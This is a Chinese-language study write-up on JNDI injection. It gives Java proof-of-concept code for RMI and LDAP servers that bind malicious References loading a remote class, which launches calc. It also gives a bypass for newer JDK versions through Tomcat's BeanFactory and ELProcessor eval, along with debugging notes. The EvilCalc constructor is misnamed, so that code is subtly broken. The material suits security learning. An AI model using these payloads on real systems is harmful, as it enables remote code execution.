JNDI注入学习
参考:
从文档开始的jndi注入之路
openJDK之如何下载各个版本的openJDK源码
JNDI+RMI
代码
IRemoteObj
package cn.evo1ution;
import java.rmi.Remote; import java.rmi.RemoteException;
public interface IRemoteObj extends Remote { public String sayHello(String keywords) throws RemoteException; }
|
RemoteObjImpl
package cn.evo1ution;
import java.rmi.RemoteException; import java.rmi.server.UnicastRemoteObject;
public class RemoteObjImpl extends UnicastRemoteObject implements IRemoteObj{ public RemoteObjImpl() throws RemoteException {
}
@Override public String sayHello(String keywords) throws RemoteException { String upKeywords = keywords.toUpperCase(); System.out.println(upKeywords); return upKeywords; } }
|
RMIServer
package cn.evo1ution;
import java.rmi.AlreadyBoundException; import java.rmi.RemoteException; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry;
public class RMIServer { public static void main(String[] args) throws RemoteException, AlreadyBoundException { IRemoteObj remoteObj = new RemoteObjImpl(); Registry registry = LocateRegistry.createRegistry(10999); registry.bind("remoteObj",remoteObj); } }
|
RMIClient
package cn.evo1ution;
import java.rmi.NotBoundException; import java.rmi.RemoteException; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry;
public class RMIClient { public static void main(String[] args) throws RemoteException, NotBoundException { Registry registry = LocateRegistry.getRegistry("127.0.0.1",10999); IRemoteObj remoteObj = (IRemoteObj) registry.lookup("remoteObj"); remoteObj.sayHello("hello"); } }
|
JNDIRMIServer
package cn.evo1ution;
import javax.naming.Context; import javax.naming.InitialContext; import javax.naming.NamingException; import javax.naming.Reference; import java.rmi.RemoteException;
public class JNDIRMIServer { public static void main(String[] args) throws NamingException, RemoteException { InitialContext initialContext = new InitialContext();
Reference reference = new Reference("EvilCalc", "EvilCalc", "http://localhost:7777/"); initialContext.rebind("rmi://localhost:10999/remoteObj",reference); } }
|
JNDIRMIClient
package cn.evo1ution;
import javax.naming.InitialContext; import javax.naming.NamingException; import java.rmi.RemoteException;
public class JNDIRMIClient { public static void main(String[] args) throws NamingException, RemoteException { InitialContext initialContext = new InitialContext(); IRemoteObj remoteObj = (IRemoteObj) initialContext.lookup("rmi://localhost:10999/remoteObj"); System.out.println(remoteObj.sayHello("hello"));
} }
|
EvilCalc
只保留该类的class
即可
import java.io.IOException;
public class EvilCalc { public Calc() throws IOException { Runtime.getRuntime().exec("calc"); } }
|
流程分析
看不到jndi
源码,只能看到反编译源码的解决方案:点击https://hg.openjdk.org/jdk8/jdk8/jdk/
页面左侧的zip
下载所有源码(找一下自己对应的版本),把里面jdk-687fd7c7986d\src\share\classes\com\sun\jndi
文件夹整个复制到jdk1.8.0_65\src\com\sun
目录下,重新打开下idea
即可,一些操作可以参考这篇博客和openJDK之如何下载各个版本的openJDK源码。
断点下在JNDIRMIClient
,本地在恶意类所在目录开一个服务,然后从lookup
开始调试
data:image/s3,"s3://crabby-images/9df05/9df0505e64736ccc7ea8df6a153cd495ffb0280c" alt="jndi-1.png"
data:image/s3,"s3://crabby-images/99cfa/99cfa4f0b2b70a9ee7e10bb9deb2f1e29de62fb2" alt="jndi-2.png"
data:image/s3,"s3://crabby-images/fcc23/fcc23fecfe5bc7157be62867a4933e827d4cf716" alt="jndi-3.png"
data:image/s3,"s3://crabby-images/0a3f3/0a3f37659de505cd4c38bb22ec74e45e19c7cc3b" alt="jndi-4.png"
data:image/s3,"s3://crabby-images/915e8/915e856c6ebe9f47a896c8fc04197296a2e675e8" alt="jndi-5.png"
data:image/s3,"s3://crabby-images/fc5c5/fc5c57582c06a65716e15548821866fe75e2bcc3" alt="jndi-6.png"
data:image/s3,"s3://crabby-images/3b614/3b614d013a0a9b23d94728ca5ee5bf8b7ac877b2" alt="jndi-7.png"
JNDI+LDAP
代码
Java版本为8u141
JNDILDAPServer
package cn.evo1ution;
import javax.naming.InitialContext; import javax.naming.NamingException; import javax.naming.Reference;
public class JNDILDAPServer { public static void main(String[] args) throws NamingException { InitialContext initialContext = new InitialContext(); Reference reference = new Reference("EvilCalc", "EvilCalc", "http://localhost:7777/"); initialContext.rebind("ldap://localhost:10389/cn=test,dc=example,dc=com",reference); } }
|
JNDILDAPClient
package cn.evo1ution;
import javax.naming.InitialContext; import javax.naming.NamingException;
public class JNDILDAPClient { public static void main(String[] args) throws NamingException { InitialContext initialContext = new InitialContext(); initialContext.lookup("ldap://localhost:10389/cn=test,dc=example,dc=com"); } }
|
ApacheDirectoryStudio
如果遇到什么奇葩问题(比如明明端口没被占用说被占用了)解决不了建议试试重启电脑
data:image/s3,"s3://crabby-images/61f54/61f543122e13b22ff78ef4e86830b4d7b9e3c056" alt="jndi-8.png"
流程分析
断点下在JNDILDAPClient
,本地在恶意类所在目录开一个服务,然后从lookup
开始调试
data:image/s3,"s3://crabby-images/79c22/79c220f922d43b0eecf4c034d5be1b467a49bd55" alt="jndi-9.png"
data:image/s3,"s3://crabby-images/3d3e7/3d3e77c0308594406cb0ad7d8ffbe6f8bd5cb795" alt="jndi-10.png"
data:image/s3,"s3://crabby-images/6b785/6b78588bd2da86ef5bd9bccd876751c391a4e911" alt="jndi-11.png"
data:image/s3,"s3://crabby-images/3b8e3/3b8e39c959ffb0c4874a34a478b2273f5180ec21" alt="jndi-12.png"
data:image/s3,"s3://crabby-images/fe0c5/fe0c5b4a4dd09c06c868d7df16fccf593b158c26" alt="jndi-13.png"
data:image/s3,"s3://crabby-images/df7b5/df7b5dd34e53a4d664e461377e077141b73bd8cf" alt="jndi-14.png"
data:image/s3,"s3://crabby-images/a1bac/a1bacbbf8a470a1c8e9096fd419816ccc5c03fa5" alt="jndi-15.png"
data:image/s3,"s3://crabby-images/77c55/77c5579253e88353ffa0de2595b67a1f97f4f0cc" alt="jndi-16.png"
data:image/s3,"s3://crabby-images/c315c/c315caf6a18c668ca5fea1df2090cd48d55c5fe0" alt="jndi-17.png"
data:image/s3,"s3://crabby-images/a7660/a766099ce11d3a2b309c2b574b73b3c5a1647e25" alt="jndi-18.png"
data:image/s3,"s3://crabby-images/50389/5038954bfbce94a7a10e287563ad38211f62b9d2" alt="jndi-19.png"
JNDI+RMI高版本绕过
代码
Java版本为8u241
JNDIRMIServerBypass
package cn.evo1ution;
import org.apache.naming.ResourceRef;
import javax.naming.InitialContext; import javax.naming.NamingException; import javax.naming.StringRefAddr;
public class JNDIRMIServerBypass { public static void main(String[] args) throws NamingException { InitialContext initialContext = new InitialContext(); ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null); resourceRef.add(new StringRefAddr("forceString","x=eval")); resourceRef.add(new StringRefAddr("x","Runtime.getRuntime().exec('calc')")); initialContext.rebind("rmi://localhost:10999/remoteObj",resourceRef); } }
|
Test
import javax.naming.InitialContext; import javax.naming.NamingException;
public class Test { public static void main(String[] args) throws NamingException { InitialContext initialContext=new InitialContext(); initialContext.lookup("rmi://localhost:10999/remoteObj"); } }
|
流程分析
老样子,从look
开始
data:image/s3,"s3://crabby-images/a29ed/a29ed7e334a40d00a7244da46c1539541c97abff" alt="jndi-20.png"
data:image/s3,"s3://crabby-images/f616a/f616a1ce1c5af8ca92cd9936a1c2c60955945e34" alt="jndi-21.png"
data:image/s3,"s3://crabby-images/c2af7/c2af7ee8fca6fdc1a62af095ccb30f8c9b910269" alt="jndi-22.png"
data:image/s3,"s3://crabby-images/5489b/5489b348e1f489c81a4ebb960e2e315e91e2f88e" alt="jndi-23.png"
data:image/s3,"s3://crabby-images/3eb58/3eb58cf30642259933a46e7c29759b4f384e0b72" alt="jndi-24.png"
data:image/s3,"s3://crabby-images/df584/df58423a8cb92356c077be4565ea68613d79497b" alt="jndi-25.png"
data:image/s3,"s3://crabby-images/1f4e8/1f4e87bff30e50b9e181530cde892f583c31c304" alt="jndi-26.png"
data:image/s3,"s3://crabby-images/c3c4c/c3c4c96cbf37555f89dcbf61aa9596bcce373644" alt="jndi-27.png"
data:image/s3,"s3://crabby-images/45f02/45f02c4b5752079192a5c4d57b18232ca475ef31" alt="jndi-28.png"
data:image/s3,"s3://crabby-images/c7dd7/c7dd78a025aba6ba87094360d18e30b284a4aaf6" alt="jndi-29.png"
data:image/s3,"s3://crabby-images/e5824/e582428df5fe53c506aa3910e4480d32435c6622" alt="jndi-30.png"